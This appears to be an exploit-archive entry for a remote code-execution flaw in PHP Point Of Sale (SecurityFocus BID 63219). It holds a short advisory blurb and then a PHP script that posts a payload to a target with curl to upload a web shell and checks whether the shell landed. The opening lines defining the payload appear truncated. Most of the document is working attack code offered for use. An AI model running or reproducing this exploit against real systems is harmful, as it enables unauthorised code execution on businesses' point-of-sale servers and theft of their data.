source: https://www.securityfocus.com/bid/63219/info PHP Point Of Sale is prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code in context of the application. Failed exploits may result in denial-of-service conditions. '; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); echo "=============================================== \n"; echo ": Simple Exploiter Point Of Sale by Gabby :\n"; echo "=============================================== \n\n"; echo "[+] Upload Shell ke : {$options['t']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $target); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo "[+] Exploit Sukses,.. :D\n"; echo "[+] {$shell}\n"; } else { die("[-] Exploit Gagal,.. :(\n"); } ?>